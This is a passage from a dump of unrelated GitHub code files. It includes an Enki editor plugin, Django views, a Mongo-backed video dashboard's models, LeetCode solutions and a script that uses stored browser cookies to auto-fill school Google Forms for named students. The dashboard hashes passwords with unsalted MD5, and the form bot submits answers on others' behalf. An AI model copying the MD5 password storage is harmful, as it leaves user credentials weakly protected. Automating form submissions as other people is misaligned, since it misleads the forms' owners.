one ctags language is mapped to multiple Qutepart languages\n# NOTE this map must be updated after new languages have been added to ctags or Qutepart\n# Initially filled on Qutepart 1.1.0 and Ctags 5.9~svn20110310\n_CTAGS_TO_QUTEPART_LANG_MAP = {\n    \"Asm\": (\"AVR Assembler\", \"GNU Assembler\", \"MIPS Assembler\",\n            \"Asm6502\", \"Intel x86 (NASM)\", \"Motorola 68k (VASM/Devpac)\", \"PicAsm\"),\n    \"Asp\": (\"ASP\",),\n    \"Awk\": (\"AWK\",),\n    \"Basic\": (\"FreeBASIC\", \"KBasic\", \"MonoBasic\", \"PureBasic\", \"TI Basic\"),\n    \"C\": (\"C\",),\n    \"C#\": (\"C#\",),\n    \"C++\": (\"C++\",),\n    \"DosBatch\": (\"MS-DOS Batch\",),\n    \"Eiffel\": (\"Eiffel\",),\n    \"Erlang\": (\"Erlang\",),\n    \"Flex\": (\"Lex/Flex\",),\n    \"Fortran\": (\"Fortran\",),\n    \"Go\": (\"Go\",),\n    \"HTML\": (\"Django HTML Template\", \"HTML\", \"Ruby/Rails/RHTML\"),\n    \"Java\": (\"Java\",),\n    \"JavaScript\": (\"JavaScript\",),\n    \"Lisp\": (\"Common Lisp\",),\n    \"Lua\": (\"Lua\",),\n    \"Make\": (\"Makefile\",),\n    \"Matlab\": (\"Matlab\",),\n    \"ObjectiveC\": (\"Objective-C\", \"Objective-C++\"),\n    \"OCaml\": (\"Objective Caml\",),\n    \"Pascal\": (\"Pascal\",),\n    \"Perl\": (\"Perl\",),\n    \"PHP\": (\"PHP/PHP\", \"PHP (HTML)\"),\n    \"Python\": (\"Python\",),\n    \"REXX\": (\"REXX\",),\n    \"Ruby\": (\"Ruby\",),\n    \"Scheme\": (\"Scheme\",),\n    \"Sh\": (\"Zsh\", \"Bash\"),\n    \"SML\": (\"SML\",),\n    \"SQL\": (\"SQL\", \"SQL (MySQL)\", \"SQL (PostgreSQL)\"),\n    \"Tcl\": (\"Tcl/Tk\",),\n    \"Tex\": (\"LaTeX\", \"Texinfo\"),\n    \"Vera\": (\"Vera\",),\n    \"Verilog\": (\"Verilog\",),\n    \"VHDL\": (\"VHDL\",),\n    \"YACC\": (\"Yacc/Bison\",)\n}\n\n\n# build the reverse map\n_QUTEPART_TO_CTAGS_LANG_MAP = {}\nfor ctagsLang, qutepartLangs in _CTAGS_TO_QUTEPART_LANG_MAP.items():\n    for qutepartLang in qutepartLangs:\n        _QUTEPART_TO_CTAGS_LANG_MAP[qutepartLang] = ctagsLang\n\n\nclass ProcessorThread(QThread):\n    \"\"\"Thread processes text with ctags and returns tags\n    \"\"\"\n    tagsReady = pyqtSignal(list)\n    error = pyqtSignal(str)\n\n    _Task = collections.namedtuple(\"Task\", [\"ctagsLang\", \"text\", \"sortAlphabetically\"])\n\n    def __init__(self):\n        QThread.__init__(self)\n        self._queue = queue.Queue()\n        self.start(QThread.LowPriority)\n\n    def process(self, ctagsLang, text, sortAlphabetically):\n        \"\"\"Parse text and emit tags\n        \"\"\"\n        self._queue.put(self._Task(ctagsLang, text, sortAlphabetically))\n\n    def stopAsync(self):\n        self._queue.put(None)\n\n    def run(self):\n        \"\"\"Thread function\n        \"\"\"\n        while True:  # exits with break\n            # wait for a task\n            task = self._queue.get()\n            # take only the most recent task\n            while self._queue.qsize():\n                task = self._queue.get()\n\n            if task is None:  # None is a quit command\n                break\n\n            try:\n                tags = ctags.processText(task.ctagsLang, task.text, task.sortAlphabetically)\n            except ctags.FailedException as ex:\n                self.error.emit(ex.args[0])\n            else:\n                if not self._queue.qsize():  # do not emit results if a newer task is already queued\n                    self.tagsReady.emit(tags)\n\n\nclass SettingsWidget(QWidget):\n    \"\"\"Settings widget. 
Inserted as a page into UISettings\n    \"\"\"\n\n    def __init__(self, *args):\n        QWidget.__init__(self, *args)\n        uic.loadUi(os.path.join(os.path.dirname(__file__), 'Settings.ui'), self)\n        self.pbCtagsPath.clicked.connect(self._onPbCtagsPathClicked)\n        self.leCtagsPath.textChanged.connect(self._updateExecuteError)\n\n    def _onPbCtagsPathClicked(self):\n        path, _ = QFileDialog.getOpenFileName(core.mainWindow(), 'Ctags path')\n        if path:\n            self.leCtagsPath.setText(path)\n\n    def _updateExecuteError(self, path):\n        \"\"\" Check if ctags is installed.\n\n        Update the error label accordingly\n        \"\"\"\n        try:\n            stdout, stderr = gco.get_console_output([path, '--version'])\n        except OSError as ex:\n            self.lExecuteError.setText('Failed to execute ctags: {}'.format(ex))\n        else:\n            if 'Exuberant Ctags' in stdout:\n                self.lExecuteError.setText('ctags is found!')\n            elif 'GNU Emacs' in stdout:\n                self.lExecuteError.setText(\n                    'You are trying to use etags from the Emacs package, but it is not supported. Use Exuberant Ctags.')\n\n\nclass Plugin(QObject):\n    \"\"\"Main class. Interface for the core.\n    \"\"\"\n\n    def __init__(self):\n        QObject.__init__(self)\n        self._dock = None\n        core.workspace().currentDocumentChanged.connect(self._onDocumentChanged)\n        core.workspace().textChanged.connect(self._onTextChanged)\n\n        core.uiSettingsManager().aboutToExecute.connect(self._onSettingsDialogAboutToExecute)\n        core.uiSettingsManager().dialogAccepted.connect(self._scheduleDocumentProcessing)\n\n        # If we updated the tree on every keypress, freezes would be noticeable (the GUI thread draws the tree too slowly).\n        # This timer rebuilds the tree 1000 ms after the user has stopped typing.\n        self._typingTimer = QTimer()\n        self._typingTimer.setInterval(1000)\n        self._typingTimer.setSingleShot(True)\n        self._typingTimer.timeout.connect(self._scheduleDocumentProcessing)\n\n        self._thread = ProcessorThread()\n\n    def terminate(self):\n        \"\"\"Uninstall the plugin\n        \"\"\"\n        if self._dock is not None:\n            self._thread.tagsReady.disconnect(self._dock.setTags)\n            self._thread.error.disconnect(self._dock.onError)\n            self._dock.remove()\n            self._dock.term()\n        self._typingTimer.stop()\n        self._thread.stopAsync()\n        self._thread.wait()\n\n        core.workspace().currentDocumentChanged.disconnect(self._onDocumentChanged)\n        core.workspace().textChanged.disconnect(self._onTextChanged)\n        core.uiSettingsManager().aboutToExecute.disconnect(self._onSettingsDialogAboutToExecute)\n        core.uiSettingsManager().dialogAccepted.disconnect(self._scheduleDocumentProcessing)\n\n    def _createDock(self):\n        self._dock = NavigatorDock()\n        self._dock.setVisible(False)\n        self._dock.shown.connect(self._onDockShown)\n        self._dock.closed.connect(self._onDockClosed)\n\n        self._thread.tagsReady.connect(self._dock.setTags)\n        self._thread.error.connect(self._dock.onError)\n\n    def _isEnabled(self):\n        return core.config()['Navigator']['Enabled']\n\n    def _isSupported(self, document):\n        return document is not None and \\\n               document.qutepart.language() in _QUTEPART_TO_CTAGS_LANG_MAP\n\n    def _onDockClosed(self):\n        \"\"\"Dock has been closed by a user. Change Enabled option\n        \"\"\"\n        if core.config()['Navigator']['Enabled']:\n            core.config()['Navigator']['Enabled'] = False\n            core.config().flush()\n            self._dock.setTags([])\n\n    def _onDockShown(self):\n        \"\"\"Dock has been shown by a user. 
Change Enabled option\n \"\"\"\n if not core.config()['Navigator']['Enabled']:\n core.config()['Navigator']['Enabled'] = True\n core.config().flush()\n self._scheduleDocumentProcessing()\n\n def _onDocumentChanged(self, old, new):\n if self._isSupported(new):\n if self._dock is None:\n self._createDock()\n self._dock.install()\n if self._isEnabled():\n self._dock.show()\n self._scheduleDocumentProcessing()\n else:\n self._clear()\n if self._dock is not None:\n self._dock.remove()\n\n def _onTextChanged(self):\n if self._isEnabled():\n self._typingTimer.stop()\n self._typingTimer.start()\n\n def _clear(self):\n if self._dock is not None:\n self._dock.setTags([])\n\n def _scheduleDocumentProcessing(self):\n \"\"\"Start document processing with the thread.\n \"\"\"\n self._typingTimer.stop()\n\n document = core.workspace().currentDocument()\n if document is not None and \\\n document.qutepart.language() in _QUTEPART_TO_CTAGS_LANG_MAP:\n ctagsLang = _QUTEPART_TO_CTAGS_LANG_MAP[document.qutepart.language()]\n self._thread.process(ctagsLang, document.qutepart.text,\n core.config()['Navigator']['SortAlphabetically'])\n\n def _onSettingsDialogAboutToExecute(self, dialog):\n \"\"\"UI settings dialogue is about to execute.\n Add own options\n \"\"\"\n widget = SettingsWidget(dialog)\n\n dialog.appendPage(\"Navigator\", widget, QIcon(':/enkiicons/goto.png'))\n\n # Options\n dialog.appendOption(TextOption(dialog, core.config(),\n \"Navigator/CtagsPath\", widget.leCtagsPath))\n dialog.appendOption(CheckableOption(dialog, core.config(),\n \"Navigator/SortAlphabetically\",\n widget.cbSortTagsAlphabetically))\n","repo_name":"andreikop/enki","sub_path":"enki/plugins/navigator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"21"} +{"seq_id":"29551839969","text":"from django.shortcuts import render, redirect, reverse\nfrom . 
models import * \nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom accounts.forms import NewLeaveForm\n\n@login_required(login_url='login/')\ndef staffDashboard(request):\n    user = request.user \n    staff = user.staff\n    leaves = Leave.objects.filter(staff=staff).all()\n    context = {'leaves': leaves}\n    return render(request, 'staffDashboard.html', context)\n\n\n@login_required(login_url='login/')\ndef new_leave(request):\n    user = request.user\n    staff = user.staff\n\n    form = NewLeaveForm()\n\n    if request.method == \"POST\":\n        form = NewLeaveForm(request.POST)\n        if form.is_valid():\n            leave = form.save(commit=False)\n            leave.staff = staff\n            leave.save()\n            return redirect(reverse('staffDashboard'))\n\n    context = {'form': form}\n    return render(request, 'new_leave.html', context)\n\n\n@login_required(login_url='login/')\ndef view_leave(request, leave_id):\n    user = request.user\n    staff = user.staff \n    leave = Leave.objects.filter(staff=staff).get(id=leave_id)\n\n    context = {'leave': leave}\n    return render(request, 'view_leave.html', context)\n\n\n@login_required(login_url='login/')\ndef approved_leaves(request):\n    user = request.user\n    staff = user.staff\n    approved_leaves = Leave.objects.filter(staff=staff, status=True)\n    context = {'approved_leaves': approved_leaves}\n    return render(request, 'approved.html', context)\n\n@login_required(login_url='login/')\ndef pending_leaves(request):\n    user = request.user\n    staff = user.staff\n    pending_leaves = Leave.objects.filter(staff=staff, status=False)\n    context = {'pending_leaves': pending_leaves}\n    return render(request, 'pending.html', context)","repo_name":"Muftawu/LeaveManagementSystem","sub_path":"leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31347471547","text":"# This file is about lab tests on AWS S3.\n\nimport boto3\n\naws_mg_con = boto3.session.Session(profile_name = "py-bot", region_name = "us-east-1")\ns3=aws_mg_con.client(\"s3\")\n\nprint(dir(s3))\n\n# Testing the changes done in the file. 
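\n\n# Editor's addition - a hedged usage sketch, not part of the original lab test:\n# list the buckets visible to this profile (assumes \"py-bot\" has s3:ListAllMyBuckets).\nfor bucket in s3.list_buckets().get(\"Buckets\", []):\n    print(bucket[\"Name\"])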
\n","repo_name":"dev-ahuja/narendra-python","sub_path":"S3.py","file_name":"S3.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74212867573","text":"class Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n ransomCounter=Counter(ransomNote)\n \n for note,count in ransomCounter.items():\n if note in magazine:\n if count>magazine.count(note):\n return False\n else:\n return False\n return True \n","repo_name":"harshit28/Leetcode","sub_path":"ransomnote.py","file_name":"ransomnote.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14399831328","text":"import hashlib\nimport random\nimport string\nfrom typing import Optional, Literal, List\n\nimport jose\nfrom bson import ObjectId\nfrom bson.errors import BSONError\nfrom jose import jwt\nfrom pydantic import BaseModel, Field\n\nfrom config.queries import Query\nfrom datetime import datetime\n\nfrom config.settings import SECRET_KEY\nfrom config.utils import datetime_now, convert_datetime_to_date_hourly\nfrom config.settings import db # # # Do Not Delete This Import\n\n\nclass BsonObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if isinstance(v, str):\n try:\n ObjectId(v)\n except BSONError:\n raise TypeError('Invalid ObjectId')\n elif not isinstance(v, ObjectId):\n raise TypeError('ObjectId required')\n return str(v)\n\n\nclass Access(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n access: Literal[\n 'AddAdmin', 'ModifyAdmin', ' ViewAdmin', 'EditDashboardProfile', 'ViewAccessGroup', 'AddAccessGroup',\n 'AddProvider', 'ModifyProvider', 'ViewProvider']\n\n\nclass AccessGroup(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n title: str\n accesses: list\n\n\nclass Provider(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n dc_id: str # data center id which is in DataCenterServer table\n logo_file_id: str # file id which is in File table\n url: str # Relative URL which becomes complete by dc download_url in ServerInfo table\n\n\nclass Admin(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n username: str\n password: str\n super_admin: bool = False\n email: Optional[str]\n title: Optional[str]\n avatar_id: Optional[str]\n access_group_ids: Optional[List]\n last_access_time: datetime = datetime_now()\n status: Literal['Active', 'Deactive'] = 'Active'\n provider_id: Optional[str]\n\n @property\n def is_super_admin(self):\n return self.super_admin\n\n @property\n def _id(self):\n return ObjectId(self.id) if self.id else None\n\n def check_password(self, raw_password: str):\n return self.password == hashlib.md5(raw_password.encode('utf-8')).hexdigest()\n\n @classmethod\n def make_password(cls, raw_password):\n return hashlib.md5(raw_password.encode('utf-8')).hexdigest()\n\n\nclass DataCenterInfo(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n download_url: str\n upload_url: str\n\n\nclass File(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n dc_id: str\n status: Literal['Draft', 'Done']\n type: Literal['Avatar', 'Logo', 'Poster', 'Image']\n secret: str\n download_url: str\n extension: str\n size: int\n name: str\n\n @classmethod\n def make_secret(cls):\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15))\n\n @classmethod\n 
def uploader_check_hash(cls, key):\n try:\n return jwt.decode(key, SECRET_KEY)\n except jose.exceptions.JWTError as e:\n raise ValueError('secret key is not valid')\n\n @classmethod\n def update_source_files_id(cls, type, source_id, file_id):\n if type == 'Avatar':\n res = Admin.update_one({'_id': source_id}, avatar_id=file_id)\n if res.modified_count == 0:\n res = Person.update_one({'_id': source_id}, avatar_id=file_id)\n return res.modified_count\n if type == 'Logo':\n res = Provider.update_one({'_id': source_id}, logo_file_id=file_id)\n return res.modified_count\n if type == 'Poster':\n res = Content.update_one({'_id': source_id}, poster_id=file_id)\n return res.modified_count\n if type == 'Image':\n content = Content.get_one(_id=source_id)\n if len(content.images_id) >= 10:\n Content.update_variable({'_id': source_id}, {'$pop': {'images_id': -1}})\n res = Content.update_variable({'_id': source_id}, {'$push': {'images_id': file_id}})\n return res.modified_count\n\n @classmethod\n def uploader_make_hash(cls, secret, dc_id, source_id, type, file_id):\n data = {\n 'secret': secret,\n 'dc_id': dc_id,\n 'source_id': source_id,\n 'type': type,\n 'file_id': file_id\n }\n return jwt.encode(data, SECRET_KEY, algorithm='HS256')\n\n\nclass Genre(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\nclass Tag(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\n# TODO clear category Enum or Model\nclass Category(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\nclass Content(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id', default=None)\n title: str\n type: Literal['Movie', 'SeriesEpisode', 'NewSeries'] = ''\n series_id: Optional[str]\n season: Optional[int]\n episode: Optional[int]\n summery: str\n language: Literal['Persian', 'English']\n genre: List[str]\n # TODO clear category Enum or Model\n # category: str\n age: Literal['Adults', 'Children', 'Both']\n director_id: str\n producer_id: str\n persons_id: Optional[List[str]]\n actors_id: list\n IMDB_link: Optional[str]\n tags: Optional[List[str]]\n\n status: Literal['Uploading', 'AwaitingConfirmation', 'Published', 'Deleted', 'Rejected', 'IsSeries'] = 'IsSeries'\n status_description: Optional[str]\n\n poster_id: Optional[str] = []\n images_id: Optional[list] = []\n\n length: Optional[str] = \"00:00:00\" # 03:00:10\n publish_datetime: Optional[datetime] = datetime_now()\n\n admin_id: str\n provider_id: str\n\n MCI_traffic: Optional[float] = 0.0\n MTN_traffic: Optional[float] = 0.0\n Other_traffic: Optional[float] = 0.0\n total_traffic: Optional[float] = 0.0\n\n\nclass Person(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n full_name: str\n role: Literal['Director', 'Producer', 'Actor', 'Other']\n avatar_id: str\n\n\nclass ContentAccessLog(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n provider_id: str\n date_hourly: str # \"2022-10-12-23\"\n isp_name: Literal['MCI', 'MTN', 'Other']\n accessed_bytes: int\n traffic_factor: float = 1 # 1/traffic_factor per day\n\n @classmethod\n def traffic_pipline(cls, start_time, end_time, provider_id, content_id):\n match_list = [{'$and': [\n {'date_hourly': {\n '$gt': convert_datetime_to_date_hourly(start_time),\n '$lt': convert_datetime_to_date_hourly(end_time)\n }},\n ]}]\n if provider_id:\n match_list.append({'provider_id': {'$eq': provider_id}})\n if content_id:\n match_list.append({'content_id': {'$eq': content_id}})\n sort = {'$sort': {'date_hourly': -1}}\n group_list = [{'$group': 
{\n '_id': {'isp_name': '$isp_name'},\n 'isp_name': {'$first': '$isp_name'},\n 'date_hourly': {'$push': '$date_hourly'},\n 'accessed_bytes': {\n '$push': {'$multiply': ['$traffic_factor', '$accessed_bytes']}\n }}}]\n project = {'_id': 0, 'data': 0}\n return match_list, group_list, project, 'date_hourly', 'isp_name'\n\n @classmethod\n def get_total_traffic(cls, start_time, end_time, provider_id, content_id):\n return cls.aggregate(*cls.traffic_pipline(start_time, end_time, provider_id, content_id), skip=None, limit=None)\n\n\nclass TotalTraffic(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n date_hourly: str # \"2022-10-12-23\"\n isp_name: Literal['MCI', 'MTN', 'Other']\n accessed_bytes: int\n traffic_factor: float = 1\n\n @classmethod\n def get_total_traffic(cls, start_time, end_time):\n return cls.aggregate(*ContentAccessLog.traffic_pipline(start_time, end_time, None, None), None, None)\n\n\nclass ContentAccessCountLog(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n quality: str\n segment: str\n date_hourly: str\n access_count: int\n traffic_factor: float = 1\n\n\nclass ContentSegmentCount(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n segment: str\n quality: str\n access_count: int\n","repo_name":"nargessalehi98/vod-dashboard","sub_path":"config/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42042257962","text":"# Imported Lib\nimport json\nfrom difflib import get_close_matches\n\n# Data Reading from the Json file (Function)\ndata = json.load(open(\"data.json\"))\n\n\ndef search(user_input):\n user_input = user_input.lower()\n if user_input in data:\n return data[user_input]\n elif user_input.title() in data:\n return data[user_input.title()]\n elif user_input.upper() in data:\n return data[user_input.upper()]\n # To find a close match\n elif len(get_close_matches(user_input, data.keys())) > 0:\n close_word = get_close_matches(user_input, data.keys())[0]\n response = input(\"Did you mean '%s' instead? (Y/N) \" % close_word)\n if response == \"Y\":\n return data[close_word]\n elif response == \"N\":\n return \"Sorry we couldn't help you!! 
\"\n else:\n return \"Please Enter (Y) if Yes, or (N) if No\"\n else:\n return \"The Word Doesn't exist, Please Double check it\"\n\n\n# User Interfacing\nuser_input = input(\"Enter Word: \")\n\n# output\noutputs = search(user_input)\n\nif type(outputs) == list:\n for output in outputs:\n print(output)\nelse:\n print(output)\n","repo_name":"MElGabaly/Interactive-English-Dictionary","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18710505131","text":"import requests\nimport json\n\n\njson_request = {\n\n 'username': 'ahmad299934',\n 'name': 'ahmad',\n 'last_name': 'rmz',\n 'password': '12345',\n 'phone_number': '12345',\n 'national_code': '4125963214578',\n 'address': 'znj',\n 'house_number': '3347582695',\n 'drug_hist': True,\n 'decease_hist': False,\n 'doctor': 'sosan',\n 'offline_number':0,\n\n}\n\n\nsrc = 'http://127.0.0.1:8000/Core/'\n\nr = requests.post(src + 'signup/customer/', json=json_request, headers={'Authorization':'barear 1'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/Core/SignUpCustomer.py","file_name":"SignUpCustomer.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39799365554","text":"# sequence, k = [1, 2, 3, 4, 5, 6, 7], 5\nsequence, k = [1, 2, 3, 4, 5], 7\n# sequence, k = [2, 2, 2, 2, 2], 6\n# sequence, k = [1,1,1,1,1,1,1], 7\n# sequence, k = [7,5,5,1,1,50,50], 100\n\ndef solution(sequence, k):\n answer = []\n s, e, sum = 0, 0, sequence[0]\n len_min = len(sequence)\n\n while e < len(sequence):\n if sum == k:\n if e-s < len_min:\n len_min = e-s\n answer =[]\n answer.append([s, e])\n sum -= sequence[s]\n s += 1\n\n elif sum > k:\n sum -= sequence[s]\n s += 1\n\n else:\n e += 1\n if e == len(sequence):\n break\n sum += sequence[e]\n\n return sorted(answer, key=lambda x: x[0])[0]\n\nprint(solution(sequence, k))","repo_name":"cheol-95/Algorithm","sub_path":"re-start/035. 연속된 부분 수열의 합.py","file_name":"035. 
연속된 부분 수열의 합.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15627848690","text":"def bubble_sort(items):\n \"\"\"\n Return the items sorted using the bubble sort algorithm\n\n >>> bubble_sort([1,4,3,2,6])\n [1, 2, 3, 4, 6]\n\n >>> bubble_sort([9,1,-1,0,4,3])\n [-1, 0, 1, 3, 4, 9]\n\n >>> bubble_sort([3,1,0,1,-4,3])\n [-4, 0, 1, 1, 3, 3]\n\n \"\"\"\n n = len(items)\n for i in range(n-1):\n for j in reversed(range(i+1, n)):\n if items[j] < items[j-1]:\n items[j-1], items[j] = items[j], items[j-1]\n return items\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"bencornelis/clrs-solutions","sub_path":"algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27803937145","text":"#\n# @lc app=leetcode.cn id=169 lang=python3\n#\n# [169] 多数元素\n#\n\n# @lc code=start\nclass Solution:\n def majorityElement(self, nums: List[int]) -> int:\n res = None\n count = 0\n for n in nums:\n if count == 0:\n res = n\n if res == n:\n count += 1\n else:\n count -= 1\n return res\n# @lc code=end\n\n","repo_name":"zhiweiguo/davidzguo_leetcode","sub_path":"169.多数元素.py","file_name":"169.多数元素.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21228138000","text":"import requests\nimport bs4\nimport json\nimport pickle\nimport os.path\nimport dump_cookies\n\nquestion_types = {\n 0: \"short_answer\",\n 1: \"paragraph\",\n 2: \"multiple_choice\",\n 4: \"checkboxes\",\n 3: \"dropdown\",\n 8: \"section_title\",\n 11: \"weird_thing\"\n}\n\ndef analyze (token, info):\n pprint = lambda shit: print (json.dumps (shit, indent = 2))\n\n url = f\"https://docs.google.com/forms/d/e/{token}/viewform\"\n cookie_file_path = f\"cookies/{info [0]}.p\"\n if not os.path.isfile (cookie_file_path): dump_cookies.dump_cookies (info [0])\n with open (f\"cookies/{info [0]}.p\", \"rb\") as cookie_file:\n jar = pickle.load (cookie_file)\n response = requests.get (url, cookies = jar).text\n html = bs4.BeautifulSoup (response, \"html.parser\")\n if html.title.string == \"Page Not Found\":\n raise Exception (\"Invalid token!\")\n script_tags = list (html.find_all (\"script\"))\n last_script_tag = script_tags [-2].string\n BEGINNING = \"var FB_PUBLIC_LOAD_DATA_ = \"\n END = \"\\n;\"\n last_script_tag = last_script_tag [len (BEGINNING):(len (last_script_tag) - len (END))]\n free_bird_public_load_data = json.loads (last_script_tag)\n # (These indices are extracted from a dump of a test form's HTML)\n detailed_info = free_bird_public_load_data [1]\n # noinspection PyUnusedLocal\n description = detailed_info [0]\n questions = detailed_info [1]\n # noinspection PyUnusedLocal\n name = detailed_info [8]\n # print (f\"Description: {description}, name: {name}\")\n out_questions = []\n section_count = 1\n for in_question in questions:\n question = {\n \"id\": in_question [0],\n \"name\": in_question [1]\n }\n if in_question [3] in question_types:\n question [\"type\"] = question_types [in_question [3]]\n else:\n question [\"type\"] = \"unknown\"\n if question [\"type\"] == \"weird_thing\": continue\n if question [\"type\"] == \"section_title\":\n section_count += 1\n continue\n question [\"answer_info\"] = in_question [4]\n out_questions.append (question)\n\n response_body 
= {}\n\n name = info [1].split (\" \")\n cohort_number = info [2]\n\n # info is in the format [\"reed.eric2022@istemghs.org\", \"Eric Reed\", \"Petrecca\", \"More gaming would be cool\"]\n\n draft = []\n\n # noinspection PyUnusedLocal\n def add_normal (_answer_id, answer_value):\n response_body [f\"entry.{_answer_id}\"] = answer_value\n def add_draft (_answer_id, answer_value):\n draft.append ([None, _answer_id, [answer_value], 0])\n add = add_draft\n\n for question in out_questions:\n answer_id = question ['answer_info'] [0] [0]\n lower_name = question [\"name\"].lower ()\n type_is = lambda check_type: question [\"type\"] == check_type\n def is_yes_no (lenient = False):\n if not type_is (\"multiple_choice\"): return False\n _answer_list = question [\"answer_info\"] [0] [1]\n return _answer_list [0] [0] == \"Yes\" and (_answer_list [1] [0] == \"No\" or lenient)\n print (f\"Question ID: {question ['id']}\")\n print (f\"Answer ID: {answer_id}\")\n print (f\"Lowercase name: {lower_name}\")\n print (f\"Type: {question ['type']}\")\n\n if \"first\" in lower_name and \"name\" in lower_name and type_is (\"short_answer\"):\n print (f\"DETECTED FIRST NAME, setting {answer_id} to {name [0]}\")\n add (answer_id, name [0])\n elif \"last\" in lower_name and \"name\" in lower_name and type_is (\"short_answer\"):\n print (f\"DETECTED LAST NAME, setting {answer_id} to {name [1]}\")\n add (answer_id, name [1])\n elif \"cohort\" in lower_name and type_is (\"multiple_choice\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if cohort_number in answer [0].lower ():\n selected = answer [0]\n if selected is None: raise Exception (\"couldn't find selected\")\n print (f\"DETECTED COHORT SELECTION: {selected}\")\n add (answer_id, selected)\n elif \"ccp\" in lower_name and type_is (\"multiple_choice\"):\n print (\"DETECTED CCP\")\n add (answer_id, \"No\")\n elif \"understand\" in lower_name and is_yes_no (lenient = True):\n print (\"DETECTED UNNECESSARY CONFIRMATION\")\n add (answer_id, \"Yes\")\n elif \"breakout\" in lower_name and not \"second\" in lower_name and not \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [0].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED BREAKOUT SELECT, returning {selected}\")\n elif \"first\" in lower_name and is_yes_no ():\n print (\"DETECTED FIRST VALIDATION\")\n add (answer_id, \"Yes\")\n elif \"second\" in lower_name and not \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [1].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED SECONDARY BREAKOUT SELECT, returning {selected}\")\n elif \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [2].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED TERTIARY BREAKOUT 
SELECT, returning {selected}\")\n elif \"future\" in lower_name and type_is (\"paragraph\"):\n add (answer_id, info [4])\n print (f\"DETECTED FUTURE, returning {info [4]}\")\n elif is_yes_no ():\n add (answer_id, \"No\")\n print (f\"DETECTED OTHER YES/NO, returning no\")\n else:\n print (\"NO IDEA\")\n print (\"#\" * 10)\n\n # Get token\n script_tags = list (html.find_all (\"script\"))\n TOKEN_BEGINNING = \"_docs_flag_initialData=\"\n TOKEN_END = \";\"\n script_tag = None\n for potential_script_tag in script_tags:\n if potential_script_tag.string is None: continue\n if potential_script_tag.string.startswith (TOKEN_BEGINNING):\n script_tag = potential_script_tag\n break\n if script_tag is None: raise Exception (\"Couldn't find script tag\")\n script_tag_text = script_tag.string\n token_json = script_tag_text [len (TOKEN_BEGINNING):(len (script_tag_text) - len (TOKEN_END))]\n token_data = json.loads (token_json)\n print (f\"Extracted token: {token_data ['info_params'] ['token']}\")\n\n input_tags = list (html.find_all (\"input\"))\n freebird_submission_token = None\n for input_tag in input_tags:\n if input_tag [\"type\"] != \"hidden\": continue\n if input_tag 